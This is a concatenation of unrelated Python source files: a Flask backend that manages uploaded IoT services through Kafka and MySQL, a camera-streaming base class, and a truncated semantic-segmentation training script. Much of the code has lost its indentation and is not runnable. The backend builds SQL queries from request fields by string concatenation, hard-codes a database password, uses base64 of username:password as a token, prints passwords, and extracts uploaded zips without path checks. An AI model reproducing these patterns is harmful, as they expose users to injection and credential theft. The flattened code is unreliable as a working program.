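        entry = grouped.setdefault(appname, {"appname": appname, "data": []})
        entry["data"].append({"serviceid": serviceid,
                              "servicename": servicename,
                              "status": status,
                              "scheduled": scheduled})
    return list(grouped.values())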
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS_ZIP
def kafkaThread(topic):
#print("############ STARTING KAFKA CONSUMER THREAD HERE for topic "+topic)
print("Launching kafka thread for topic :",topic)
consumer = KafkaConsumer(topic,group_id='request_manager1',
bootstrap_servers=['127.0.0.1:9092'],auto_offset_reset = "latest")
#print("request "+topic)
# consumer3 = KafkaConsumer(topic,
# bootstrap_servers=['localhost:9092'],
# auto_offset_reset='earliest',
# enable_auto_commit=True,
# group_id='request_manager1',
# value_deserializer=lambda x: loads(x.decode('utf-8')))
global kafkaDict
for message in consumer:
#temp = kafkaDict[topic]
msg = message.value.decode('utf-8')
#print("###### GOT A KAFKA MESSAGE ON "+topic)
#print("Buuffer is "+temp)
# print("Topic "+topic+" msg "+msg)
#temp = temp + "\n" + msg
kafkaDict[topic].append(msg)
def validate(path,username,appname):
global DB_NAME
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
files = os.listdir(path)
directorynames = []
foldernames = list()
for name in files:
# print(name)
if name != "config.json":
directorynames.append(path+"/"+name)
foldernames.append(name)
jsondata = None
jsonpath = path+"/"+"config.json"
    with open(jsonpath) as filef:
        jsondata = json.loads(filef.read())
for name in directorynames:
foldername = name.split("/")
foldername = foldername[-1]
# print(foldername)
files = os.listdir(name)
# print(files)
#for filenames in files:
# print(filenames)
kafka_topics = []
'''
for serviceid in foldernames:
a_topic = username+"_"+appname+"_"+jsondata["Application"]["services"][serviceid]["servicename"]
kafka_topics.append(a_topic)
isscheduled = jsondata["Application"]["services"][serviceid]["scheduled"]
if isscheduled == "True":
query = "insert into "+UPLOADS_TABLE_NAME+" values(\""+username+"\",\""+appname+"\",\""+serviceid+"\",\""+ jsondata["Application"]["services"][serviceid]["servicename"] +"\",\"Scheduled to Run\",\""+jsondata["Application"]["services"][serviceid]["scheduled"]+"\")"
else:
query = "insert into "+UPLOADS_TABLE_NAME+" values(\""+username+"\",\""+appname+"\",\""+serviceid+"\",\""+ jsondata["Application"]["services"][serviceid]["servicename"] +"\",\"Not Running\",\""+jsondata["Application"]["services"][serviceid]["scheduled"]+"\")"
print("Uploading, updating tables, query = "+query)
cursor.execute(query)
'''
print("Updating tables")
for obj in jsondata["Application"]["services"]:
serviceid = obj
servicename = jsondata["Application"]["services"][obj]["servicename"]
scheduled = jsondata["Application"]["services"][obj]["scheduled"]
a_topic = username+"_"+appname+"_"+servicename
kafka_topics.append(a_topic)
status = "Stopped"
if scheduled == "True":
status = "Processing"
query = "insert into "+UPLOADS_TABLE_NAME+" values(\""+username+"\",\""+appname+"\",\""+serviceid+"\",\""+servicename+"\",\""+status+"\",\""+scheduled+"\")"
cursor.execute(query)
global kafkaDict
for i in kafka_topics:
kafkaDict[i] = []
t1 = threading.Thread(target=kafkaThread,args=(i,))
t1.start()
cursor.close()
mydb.commit()
mydb.close()
#I need to send req to Jay here as None
response = dict()
response["servicename"] = ""
response["config"] = jsondata
response["action"] = "None"
#response = json.dumps(response)
# print("####################### UPLOAD TIME REQUEST TO JAY #####################")
# print(response)
# print("####################### UPLOAD TIME REQUEST TO JAY ENDS HERE ###########")
req = requests.post(url="http://13.68.206.239:5053/schedule_service",json=response)
print("Scheduler requested to schedule services which are scheduled")
return True
'''
@app.route('/uploadService', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
global DB_NAME
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
username = request.form['username']
password = request.form['password']
print(username)
print(password)
message = username + ":" + password
message_bytes = message.encode('ascii')
base_64_bytes = base64.b64encode(message_bytes)
token = base_64_bytes.decode('ascii')
query = "select username from user where token=\""+token+"\""
print(token, " <- token")
cursor.execute(query)
if cursor.rowcount != 1:
cursor.close()
mydb.commit()
mydb.close()
return jsonify(status="failure",message="not logged in")
if 'file' not in request.files:
return jsonify(status="failure",message="Unknown error")
file = request.files['file']
if file.filename == '':
return jsonify(status="failure",message="No file selected")
if file and allowed_file(file.filename):
filename = str(file.filename)
dest = app.config['UPLOAD_FOLDER_APP']
file.save(os.path.join(app.config['UPLOAD_FOLDER_APP'], filename))
path = dest+filename
print(path)
filename = filename.split(".")
extractdest = dest+"/"+username+"/"+filename[0]
#before extracting . Delete if existing
users_folders = os.listdir(dest)
found = False
for users_names in users_folders:
if users_names == username:
found=True
if found == False:
os.mkdir(dest+"/"+username)
files = os.listdir(dest+"/"+username+"/")
print("filename[0] = ",filename[0])
for name in files:
#its a folder name. We need to compare
if name == filename[0]:
#we found a folder
print("Found match")
query = "delete from "+UPLOADS_TABLE_NAME+" where username=\""+username+"\" and appname=\""+name+"\""
cursor.execute(query)
shutil.rmtree(dest+username)
cursor.close()
mydb.commit()
mydb.close()
with zipfile.ZipFile(path, 'r') as zip_ref:
zip_ref.extractall(extractdest)
val_result = validate(extractdest,username,filename[0])
if val_result == False:
return jsonify(upload="success",validation="failure")
else:
return jsonify(upload="success",validation="success")
return
<!doctype html>
<title>Upload new File</title>
<h1>Upload the Service Here</h1>
<form method=post enctype=multipart/form-data>
<input type=file name=file>
<br><br>Enter Username :
<input type=text name=username>
<br><br>
Enter Password :
<input type=text name=password>
<br><br>
<input type=submit value=Upload>
</form>
'''
class processUpload(Resource):
def get(self):
return
def post(self):
recvd_params = request.get_json(force=True)
extractdest = recvd_params["extractdest"]
username = recvd_params["username"]
filename = recvd_params["filename"]
# print("Process upload got called")
print("Uploading")
validate(extractdest,username,filename)
return
class output(Resource):
def get(self,num):
return {"result":num*10}
def post(self):
recvd_params = request.get_json(force=True)
username = recvd_params["username"]
serviceid = recvd_params["serviceid"]
appname = recvd_params["appname"]
'''
we need to get data from kafka and send it in output
'''
#create topic username_applicationname_servicename
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
query = "select servicename from "+UPLOADS_TABLE_NAME+" where username=\""+username+"\" AND serviceid=\""+serviceid+"\" AND appname=\""+appname+"\""
cursor.execute(query)
servicename = None
for x in cursor:
servicename = x[0]
cursor.close()
mydb.commit()
mydb.close()
print("Output requested for username : "+username+" appname : "+appname+" servicename : "+servicename)
topic = username+"_"+appname+"_"+servicename
global kafkaDict
msg = kafkaDict[topic]
# print("############ FROM OUTPUT, msg = ")
# for i in msg:
# print(i)
# print(" and topicname is "+topic)
#msg = json.dumps(msg)
return jsonify(status="success",output=msg)
class sendToScheduler(Resource):
def get(self):
return
def post(self):
recvd_params = request.get_json(force=True)
appname = recvd_params["appname"]
serviceid = recvd_params["serviceid"]
username = recvd_params["username"]
requesttype = recvd_params["request"]
dest = app.config['UPLOAD_FOLDER_APP']
json_path = dest+"/"+username+"/"+appname+"/"+"config.json"
        with open(json_path, "r") as file_json:
            config_data = json.load(file_json)
#Send request to Jay here:
response = dict()
response["servicename"] = serviceid
response["config"] = config_data
response["action"] = requesttype
#response = json.dumps(response)
# print("####################### FORCED REQUEST TO JAY #####################")
# print(response)
# print("####################### FORCED REQUEST TO JAY ENDS HERE ###########")
req = requests.post(url="http://13.68.206.239:5053/schedule_service",json=response)
print("Scheduler requested to schedule serviceid "+serviceid)
#return json.loads(req.text)
return
class clearoutput(Resource):
def get(self):
return
def post(self):
recvd_params = request.get_json(force=True)
global kafkaDict
opcode = recvd_params["opinfo"]
params = opcode.split(";")
username = params[0]
appname = params[1]
servicename = params[2]
print("Clearing output for service "+servicename)
#create topic username_applicationname_servicename
topicname = username+"_"+appname+"_"+servicename
kafkaDict[topicname] = list()
class configedit(Resource):
def get(self):
return
def post(self):
print("rec req for edit config")
recvd_params = request.get_json(force=True)
username = recvd_params["username"]
concat = recvd_params["service"]
concat = concat.split("_")
appname = concat[0]
servicename = concat[1]
start = recvd_params["starttime"]
end = recvd_params["endtime"]
day = recvd_params["day"]
rec_scheduled = recvd_params["schtype"]
sensortype = recvd_params["sensortype"]
location = recvd_params["location"]
datarate = recvd_params["datarate"]
action = recvd_params["action"]
#create config
config_file_path = app.config['UPLOAD_FOLDER_APP'] + username+"/"+appname+"/"+"config.json"
print("Config file path = "+config_file_path)
file_json = open(config_file_path,"r")
config_data=json.load(file_json)
file_json.close()
serviceids = []
serviceid = None
for obj in config_data["Application"]["services"]:
serviceids.append(obj)
if config_data["Application"]["services"][obj]["servicename"] == servicename:
serviceid = obj
print("Service id set "+obj)
maximum = -1
for i in serviceids:
temp = i.split("-")
numb = temp[1]
numb = int(numb)
if numb > maximum:
maximum = numb
newnumber = maximum+1
newnumber = str(newnumber)
print("Maximum number is "+newnumber)
newservicename= "service-"+newnumber
print("new servicename "+newservicename)
src = app.config['UPLOAD_FOLDER_APP'] + username+"/"+appname+"/"+servicename+"/"
dst = app.config['UPLOAD_FOLDER_APP'] + username+"/"+appname+"/"+newservicename+"/"
shutil.copytree(src, dst)
copyofconfig = config_data["Application"]["services"][serviceid].copy()
copyofconfig["servicename"] = newservicename
temp1 = []
temp1.append(start)
copyofconfig["time"]["start"] = temp1
temp2 = []
temp2.append(end)
copyofconfig["time"]["end"] = temp2
temp3 = []
temp3.append(day)
copyofconfig["days"] =temp3
counter = 1
maindict = dict()
for i in location:
add = i.split("_")
area = add[0]
building = add[1]
room_no = add[2]
sensorid = "sensor"+str(counter)
counter = counter+1
geoloc = dict()
geoloc["lat"] = "None"
geoloc["long"] = "None"
address = dict()
address["area"] = area
address["building"] = building
address["room_no"] = room_no
proc = dict()
proc["data_rate"] = datarate
innerdict = dict()
innerdict["sensor_name"] = sensortype
innerdict["sensor_geolocation"] = geoloc
innerdict["sensor_address"] = address
innerdict["processing"] = proc
maindict[sensorid]=innerdict
copyofconfig["sensor"] = maindict
act = dict()
t1 = dict()
t1["value"] = "None"
act["Output_display_to_user"] = False
t3 = dict()
t3["message"] = "None"
t3["number"] = "None"
t4 = dict()
t4["To"] = "None"
t4["From"] = "iastiwari@gmail.com"
t4["Subject"] = "None"
t4["Text"] = "None"
if action == "displaytoadmin":
act["Output_display_to_user"] = True
elif action == "controlsensor":
t1["value"] = "None"
elif action == "email":
t4["To"] = recvd_params["email-to"]
t4["From"] = "iastiwari@gmail.com"
t4["Subject"] = recvd_params["email-subject"]
t4["Text"] = "None"
elif action=="sms":
t3["message"] = recvd_params["sms-subject"]
t3["number"] = recvd_params["sms-number"]
act["send_output_to_sensor"] = t1
act["Send_SMS"] = t3
act["Send_Email"] = t4
copyofconfig["action"] = act
copyofconfig["scheduled"] = rec_scheduled
#Handle the dependency part here
isdependency = recvd_params["dependent"]
if isdependency == "Yes":
number_of_dependencies = recvd_params["numdependency"]
deplist = list()
number_of_dependencies = number_of_dependencies + 1
for i in range(1,number_of_dependencies):
keyname = "dependcy"+str(i)
tsername = recvd_params[keyname]
tsername = tsername.split("_")
tsername = tsername[1]
deplist.append(tsername)
copyofconfig["dependency"] = deplist
print("$$$$$$$$$$$$$$$$$")
print("new copy of config is ")
print(copyofconfig)
#writing the changes here
config_data["Application"]["services"][newservicename] = copyofconfig
print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
print("New config is ")
print(config_data)
file_json = open(config_file_path,"w")
file_json.write(json.dumps(config_data,indent=4,sort_keys=True))
file_json.close()
#file written
all_services_dict = config_data["Application"]["services"].copy()
print("$$$$$$$$$$$$$$")
print(all_services_dict)
keysList = all_services_dict.keys()
keysList = list(keysList)
print("-----------------------------------------")
print(keysList)
for tserviceid in keysList:
if tserviceid != newservicename:
del all_services_dict[tserviceid]
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
scheduled = config_data["Application"]["services"][serviceid]["scheduled"]
if scheduled == "True":
config_data["Application"]["services"] = all_services_dict
print("Sending to Jay")
print(config_data)
response = dict()
response["servicename"] = ""
response["config"] = config_data
response["action"] = ""
req = requests.post(url="http://13.68.206.239:5053/schedule_service",json=response)
query = "insert into "+UPLOADS_TABLE_NAME+" values(\""+username+"\",\""+appname+"\",\""+newservicename+"\",\""+newservicename+"\",\"Processing\",\""+scheduled+"\")"
print(query)
cursor.execute(query)
else:
print("Not scheduled. Normal update")
query = "insert into "+UPLOADS_TABLE_NAME+" values(\""+username+"\",\""+appname+"\",\""+newservicename+"\",\""+newservicename+"\",\"Stopped\",\""+scheduled+"\")"
print(query)
cursor.execute(query)
print("Starting kafka thread")
a_topic = username+"_"+appname+"_"+newservicename
global kafkaDict
kafkaDict[a_topic] = []
t1 = threading.Thread(target=kafkaThread,args=(a_topic,))
t1.start()
cursor.close()
mydb.commit()
mydb.close()
print("Config update Success")
return
class config_edit_resp(Resource):
def get(self):
return
def post(self):
recvd_params = request.get_json(force=True)
username = recvd_params["username"]
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
#(username varchar(30), appname varchar(30), serviceid varchar(30),servicename varchar(50),
# status varchar(20), scheduled varchar(20))
appreqst = recvd_params["app"]
if appreqst == True:
appname = recvd_params["appname"]
query = "select appname,servicename from "+UPLOADS_TABLE_NAME+" where username=\""+username+"\" AND appname=\""+appname+"\""
cursor.execute(query)
values = []
for x in cursor:
appname = x[0]
servicename = x[1]
concat = appname+"_"+servicename
values.append(concat)
values = sorted(values)
cursor.close()
mydb.commit()
mydb.close()
return jsonify(services=values)
else:
query = "select appname,servicename from "+UPLOADS_TABLE_NAME+" where username=\""+username+"\""
cursor.execute(query)
values = []
for x in cursor:
appname = x[0]
servicename = x[1]
concat = appname+"_"+servicename
values.append(concat)
values = sorted(values)
cursor.close()
mydb.commit()
mydb.close()
return jsonify(services=values)
api.add_resource(login,'/authlogin')
api.add_resource(signup,'/authsignup')
api.add_resource(authorize,'/auth')
api.add_resource(request_manager_backend,'/req')
api.add_resource(output,'/outputlist')
api.add_resource(sendToScheduler,'/sendToScheduler')
api.add_resource(clearoutput,'/clearoutput')
api.add_resource(processUpload,'/processUpload')
api.add_resource(configedit,'/configEditReq')
api.add_resource(config_edit_resp,'/getServiceList')
def Updater():
print("Updater thread started")
while 1:
#UNCOMMENT THIS
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
query = "select username from "+USER_TABLE_NAME
cursor.execute(query)
usernames = []
for x in cursor:
usernames.append(x[0])
for name in usernames:
# Neeraj
# print("####################### UPDATE REQUEST TO SERVICE LCM #####################")
requrl = "http://13.68.206.239:8080/servicelcm/service/topology/"+name
            try:
                resp = requests.get(requrl)
            except requests.exceptions.RequestException:
                # Service LCM unreachable or timed out; skip this pass and
                # retry on the next loop iteration instead of killing the thread
                time.sleep(30)
                continue
#resp = requests.get(requrl)
# print(resp.text)
if resp.ok:
response = resp.json()
# print(response)
# print(type(response))
for block in response:
status = block["status"]
servicename = block["serviceName"]
appname = block["applicationName"]
tstatus = ""
if status == "alive":
tstatus = "Running"
elif status == "stopped" or status=="not working":
tstatus = "Stopped"
query = "update "+UPLOADS_TABLE_NAME+" set status=\""+tstatus+"\" where username=\""+name+"\" and appname=\""+appname+"\" and servicename=\""+servicename+"\""
# print("Updating for user "+name)
print(query)
cursor.execute(query)
# print("####################### UPDATE REQUEST TO SERVICE LCM ENDS HERE ###########")
cursor.close()
mydb.commit()
mydb.close()
time.sleep(3)
if __name__ == '__main__':
t1 = threading.Thread(target=Updater)
t1.start()
app.run(host=URL,port=PORT,debug=True)
|
base_camera.py
|
"""
This was originally pilfered from
https://github.com/adeept/Adeept_RaspTank/blob/a6c45e8cc7df620ad8977845eda2b839647d5a83/server/base_camera.py
Which looks like it was in turn pilfered from
https://blog.miguelgrinberg.com/post/flask-video-streaming-revisited
"Great artists steal". Thank you, @adeept and @miguelgrinberg!
"""
import time
import threading
import cv2
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
            if not event[0].is_set():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
frames_read = 0
started_at = 0
event = CameraEvent()
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
if BaseCamera.thread is None:
BaseCamera.last_access = time.time()
# start background frame thread
BaseCamera.thread = threading.Thread(target=self._thread)
BaseCamera.thread.start()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
def get_frame(self):
"""Return the current camera frame."""
BaseCamera.last_access = time.time()
# wait for a signal from the camera thread
BaseCamera.event.wait()
BaseCamera.event.clear()
return BaseCamera.frame
@staticmethod
def frames():
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
@classmethod
def _thread(cls):
"""Camera background thread."""
print('Starting camera thread.')
BaseCamera.started_at = time.time()
frames_iterator = cls.frames()
for frame in frames_iterator:
BaseCamera.frame = frame
BaseCamera.event.set() # send signal to clients
BaseCamera.frames_read += 1
time.sleep(0)
# if there hasn't been any clients asking for frames in
# the last 10 seconds then stop the thread
# if time.time() - BaseCamera.last_access > 10:
# frames_iterator.close()
# print('Stopping camera thread due to inactivity.')
# break
BaseCamera.thread = None
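# A hedged example, not part of the original module: a minimal BaseCamera
# subclass showing the frames() contract the background thread expects. It
# yields synthetic JPEG frames; the 640x480 size is arbitrary.
class _ExampleSyntheticCamera(BaseCamera):
    @staticmethod
    def frames():
        import numpy as np  # example-only dependency
        while True:
            img = np.random.randint(0, 255, (480, 640, 3), dtype=np.uint8)
            ok, jpeg = cv2.imencode('.jpg', img)
            if ok:
                yield jpeg.tobytes()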
|
segment.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import json
import logging
import math
import os
from os.path import exists, join, split
import threading
import time
import numpy as np
import shutil
import sys
from PIL import Image
import torch
from torch import nn
import torch.backends.cudnn as cudnn
import torch.optim as optim
from torchvision import datasets, transforms
from torch.autograd import Variable
import drn
import data_transforms as transforms
try:
from modules import batchnormsync
except ImportError:
pass
FORMAT = "[%(asctime)-15s %(filename)s:%(lineno)d %(funcName)s] %(message)s"
logging.basicConfig(format=FORMAT)
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
CITYSCAPE_PALETTE = np.asarray([
[128, 64, 128],
[244, 35, 232],
[70, 70, 70],
[102, 102, 156],
[190, 153, 153],
[153, 153, 153],
[250, 170, 30],
[220, 220, 0],
[107, 142, 35],
[152, 251, 152],
[70, 130, 180],
[220, 20, 60],
[255, 0, 0],
[0, 0, 142],
[0, 0, 70],
[0, 60, 100],
[0, 80, 100],
[0, 0, 230],
[119, 11, 32],
[0, 0, 0]], dtype=np.uint8)
TRIPLET_PALETTE = np.asarray([
[0, 0, 0, 255],
[217, 83, 79, 255],
[91, 192, 222, 255]], dtype=np.uint8)
def fill_up_weights(up):
w = up.weight.data
f = math.ceil(w.size(2) / 2)
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(w.size(2)):
for j in range(w.size(3)):
w[0, 0, i, j] = \
(1 - math.fabs(i / f - c)) * (1 - math.fabs(j / f - c))
for c in range(1, w.size(0)):
w[c, 0, :, :] = w[0, 0, :, :]
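# A hedged illustration, not used by training: fill_up_weights writes a
# bilinear interpolation kernel into the transposed-conv weight. For a 4x4
# kernel, f = 2 and c = 0.75, so the kernel is the outer product of
# [0.25, 0.75, 0.75, 0.25] with itself.
def _example_bilinear_kernel():
    up = nn.ConvTranspose2d(1, 1, kernel_size=4, stride=2, padding=1, bias=False)
    fill_up_weights(up)
    return up.weight.data[0, 0]  # 4x4 bilinear kernel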
class DRNSeg(nn.Module):
def __init__(self, model_name, classes, pretrained_model=None,
pretrained=True, use_torch_up=False):
super(DRNSeg, self).__init__()
model = drn.__dict__.get(model_name)(
pretrained=pretrained, num_classes=1000)
pmodel = nn.DataParallel(model)
if pretrained_model is not None:
pmodel.load_state_dict(pretrained_model)
self.base = nn.Sequential(*list(model.children())[:-2])
self.seg = nn.Conv2d(model.out_dim, classes,
kernel_size=1, bias=True)
        self.softmax = nn.LogSoftmax(dim=1)
m = self.seg
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
if use_torch_up:
self.up = nn.UpsamplingBilinear2d(scale_factor=8)
else:
up = nn.ConvTranspose2d(classes, classes, 16, stride=8, padding=4,
output_padding=0, groups=classes,
bias=False)
fill_up_weights(up)
up.weight.requires_grad = False
self.up = up
def forward(self, x):
x = self.base(x)
x = self.seg(x)
y = self.up(x)
return self.softmax(y), x
def optim_parameters(self, memo=None):
for param in self.base.parameters():
yield param
for param in self.seg.parameters():
yield param
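# A hedged sketch (assumes the local ``drn`` package provides the named
# architecture): run DRNSeg on a dummy CPU batch to show its two outputs, the
# 8x-upsampled log-softmax map and the raw low-resolution class logits.
def _example_drnseg_forward(arch='drn_d_22', classes=19):
    model = DRNSeg(arch, classes, pretrained=False)
    x = torch.zeros(1, 3, 64, 64)
    log_probs, logits = model(x)
    # expected (1, classes, 64, 64) and (1, classes, 8, 8) for an
    # output-stride-8 DRN backbone
    return log_probs.shape, logits.shape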
class SegList(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, list_dir=None,
out_name=False):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.out_name = out_name
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.read_lists()
def __getitem__(self, index):
data = [Image.open(join(self.data_dir, self.image_list[index]))]
if self.label_list is not None:
data.append(Image.open(
join(self.data_dir, self.label_list[index])))
data = list(self.transforms(*data))
if self.out_name:
if self.label_list is None:
data.append(data[0][0, :, :])
data.append(self.image_list[index])
return tuple(data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
assert len(self.image_list) == len(self.label_list)
class SegListMS(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, scales, list_dir=None):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.read_lists()
self.scales = scales
def __getitem__(self, index):
data = [Image.open(join(self.data_dir, self.image_list[index]))]
w, h = data[0].size
if self.label_list is not None:
data.append(Image.open(
join(self.data_dir, self.label_list[index])))
# data = list(self.transforms(*data))
out_data = list(self.transforms(*data))
ms_images = [self.transforms(data[0].resize((int(w * s), int(h * s)),
Image.BICUBIC))[0]
for s in self.scales]
out_data.append(self.image_list[index])
out_data.extend(ms_images)
return tuple(out_data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
assert len(self.image_list) == len(self.label_list)
def validate(val_loader, model, criterion, eval_score=None, print_freq=10):
batch_time = AverageMeter()
losses = AverageMeter()
score = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
if type(criterion) in [torch.nn.modules.loss.L1Loss,
torch.nn.modules.loss.MSELoss]:
target = target.float()
input = input.cuda()
        target = target.cuda(non_blocking=True)
with torch.no_grad():
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
# compute output
output = model(input_var)[0]
loss = criterion(output, target_var)
# measure accuracy and record loss
# prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data, input.size(0))
if eval_score is not None:
score.update(eval_score(output, target_var), input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
logger.info('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Score {score.val:.3f} ({score.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
score=score))
logger.info(' * Score {top1.avg:.3f}'.format(top1=score))
return score.avg
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
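# A hedged usage sketch: AverageMeter keeps a running sample-weighted mean,
# e.g. a per-batch loss averaged over all samples seen so far.
def _example_average_meter():
    meter = AverageMeter()
    meter.update(2.0, n=4)  # batch of 4 samples with mean loss 2.0
    meter.update(1.0, n=4)  # batch of 4 samples with mean loss 1.0
    return meter.avg        # (2.0*4 + 1.0*4) / 8 == 1.5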
def accuracy(output, target):
"""Computes the precision@k for the specified values of k"""
# batch_size = target.size(0) * target.size(1) * target.size(2)
_, pred = output.max(1)
pred = pred.view(1, -1)
target = target.view(1, -1)
correct = pred.eq(target)
correct = correct[target != 255]
correct = correct.view(-1)
score = correct.float().sum(0).mul(100.0 / correct.size(0))
return score.data
def train(train_loader, model, criterion, optimizer, epoch,
eval_score=None, print_freq=10):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
scores = AverageMeter()
# switch to train mode
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
if type(criterion) in [torch.nn.modules.loss.L1Loss,
torch.nn.modules.loss.MSELoss]:
target = target.float()
input = input.cuda()
        target = target.cuda(non_blocking=True)
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
# compute output
output = model(input_var)[0]
loss = criterion(output, target_var)
# measure accuracy and record loss
# prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data, input.size(0))
if eval_score is not None:
scores.update(eval_score(output, target_var), input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
logger.info('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Score {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses, top1=scores))
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, 'model_best.pth.tar')
def train_seg(args):
batch_size = args.batch_size
num_workers = args.workers
crop_size = args.crop_size
print(' '.join(sys.argv))
for k, v in args.__dict__.items():
print(k, ':', v)
single_model = DRNSeg(args.arch, args.classes, None,
pretrained=True)
if args.pretrained:
single_model.load_state_dict(torch.load(args.pretrained))
model = torch.nn.DataParallel(single_model).cuda()
    criterion = nn.NLLLoss(ignore_index=255)
criterion.cuda()
# Data loading code
data_dir = args.data_dir
info = json.load(open(join(data_dir, 'info.json'), 'r'))
normalize = transforms.Normalize(mean=info['mean'],
std=info['std'])
t = []
if args.random_rotate > 0:
t.append(transforms.RandomRotate(args.random_rotate))
if args.random_scale > 0:
t.append(transforms.RandomScale(args.random_scale))
t.extend([transforms.RandomCrop(crop_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize])
train_loader = torch.utils.data.DataLoader(
SegList(data_dir, 'train', transforms.Compose(t),
list_dir=args.list_dir),
batch_size=batch_size, shuffle=True, num_workers=num_workers,
pin_memory=True, drop_last=True
)
val_loader = torch.utils.data.DataLoader(
SegList(data_dir, 'val', transforms.Compose([
transforms.RandomCrop(crop_size),
transforms.ToTensor(),
normalize,
]), list_dir=args.list_dir),
batch_size=batch_size, shuffle=False, num_workers=num_workers,
pin_memory=True, drop_last=True
)
    # define the optimizer (the criterion was created above)
optimizer = torch.optim.SGD(single_model.optim_parameters(),
args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
cudnn.benchmark = True
best_prec1 = 0
start_epoch = 0
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
